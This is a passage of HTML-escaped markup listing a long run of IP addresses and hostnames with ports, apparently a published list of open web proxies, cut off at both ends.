51, 204);"&gt;222.58.225.180:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.184:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.134:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.140:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.168:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.77.14.56:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.227.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.20.115.192:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.141:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;33.182.229.157:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;36.176.51.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;37.179.9.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.130.219.180:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.18.221:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.20.11:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.24.241:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.7.134:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.8.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.56.71.32:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;39.233.235.112:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;39.56.162.243:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.203.93.104:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.215.180.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.238.29.211:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;38.164.161.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.203.136:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.168.109.60:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.204.246:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.205.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.205.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.116.160.89:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.219.149:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.108.50.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.101.107.120:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;155.230.105.156:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.75.200.199:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;152.31.128.38:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.64.105.81:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.45.68.79:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.59.124.60:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.49.183.79:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.45.216.115:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.146.149:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.238.222.93:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.245.175.172:9090&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.218.246.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.208.190.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.20.18.149:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.14.225:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;148.245.191.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.96.53.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.74.218.98:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.74.218.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.74.216.101:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.75.115.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;148.241.31.46:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.110.213:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.51.203.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;147.83.2.110:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;148.221.214.138:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.41.23.229:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.48.228.235:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;148.221.211.230:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.35.36.158:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.31.42.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.69.224.112:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.29.115.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.226.251.217:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.175.3.242:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.233.211.18:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.223.187.134:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.241.180.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.204.185.127:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;141.24.33.161:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;141.24.33.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.195.132.75:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.181.246.131:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.193.34.145:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.177.228.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.168.24.154:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.167.203.98:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;141.24.249.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;141.24.249.129:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.168.220.149:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.150.66.226:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;141.163.61.203:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.140.137.1:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.146.34.83:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.131.218.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.123.147.57:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.122.163.113:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.129.130.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;1345754371.hosts.lcs.net.pl:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.102.248.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;20.153.19.92:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;134.83.254.118:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;198.96.117.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;198.7.242.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.7.137.150:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;134.34.246.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;134.245.248.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;198.111.171.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;198.108.70.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.38.158.197:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.46.192.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.129.154.92:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;131.247.2.242:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;130.83.163.67:8090&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.218.152.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.202.153.145:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;196.2.77.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;130.238.83.197:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.129.154.39:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.75.173.209:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.70.55.151:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.57.82.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.56.42.131:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.55.164.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;130.212-142-138.static.clientes.euskaltel.es:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;129.71.63.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;129.109.166.101:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;128.232.103.203:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;128.59.20.227:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;128.134.51.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.31.219.167:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.248.250.105:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.21.51.53:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.21.227.206:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.235.160.75:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.23.30.131:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.227.118.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;42.170.29.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.193.128.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.7.11.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.93.112.28:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.93.111.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.42.34.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.28.32.119:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.231.208.203:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.222.58.252:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.220.158.27:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.2.222.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.193.147.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.193.145.158:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.193.144.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.193.144.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.193.128.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.142.250.235:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.101.112.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;42.9.194.238:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;42.48.220.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41-203-213-118.safaricombusiness.co.ke:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.72.219.79:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.72.219.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.72.219.75:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.72.219.69:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.226.230.36:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.215.192.171:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.218.117.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.90:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.207.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.200.82.161:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.252:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.187.142.244:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.165.156.79:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.205.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.21.227.205:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.207.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;42.194.28.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.193.148.92:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.242.60.251:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;43.222.56.97:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.246.84.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.64.96.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.59.145.230:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;131.247.2.241:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;198.106.194.160:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;199.187.180.83:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;140.123.102.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.160.248.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.168.220.67:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.175.22.19:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.137.98.89:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.30.64.87:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.48.66.85:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;148.244.96.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.138.30.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;201.229.193.240:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.138.207.185:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.105.182.18:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.31.190.217:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.252.144.111:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.167.219.78:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.163.193.241:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.98.169.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.147.113.116:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;174-143-152-14.static.cloud-ips.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;177.242.33.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;174.36.178.106-static.reverse.softlayer.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.98.212.203:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;174.143.222.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;174.143.152.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;174.142.24.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;173.89.83.179:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.98.168.51:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;173.45.227.172:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.98.170.3:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;173.24.117.203:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;173.175.168.156:8300&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;173.203.215.139:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.97.67.134:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;169.226.40.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.70.242.65:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;169.229.50.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.37.176.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;170.51.254.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.209.98.63:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.209.247.73:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.209.0.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.209.247.227:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.172.132.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.97.29.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;164.78.252.25:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;167.206.203.101:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;165.248.115.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;165.21.77.116:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;164.78.252.110:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.57.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;163.30.32.90:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.73.190:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.255.88:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;163.17.64.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;163.150.51.125:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;161.99.66.40:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;160.99.9.234:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;160.79.35.27:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.152.59.235:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.230.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.149.24.216:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;157.95.211.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.143.137.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.140.170.105:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.137.31.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.134.202.251:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.131.98.165:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.129.20.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.143.128.194:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;163.30.182.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.209.247.105:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;174.112.182.142:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.31.187.1:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;113.157.198.67:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;113.11.154.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;121.31.162.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;121.30.255.38:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;111.115.234.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;121.22.15.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;121.14.158.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;121.14.158.75:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;120.50.62.72:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;120.50.57.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;111.115.202.215:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;120.29.157.46:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.88.49.230:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.8.188.1:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.44.45.160:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.32.76.60:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.178.36.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.93.136.252:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.150.153.196:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 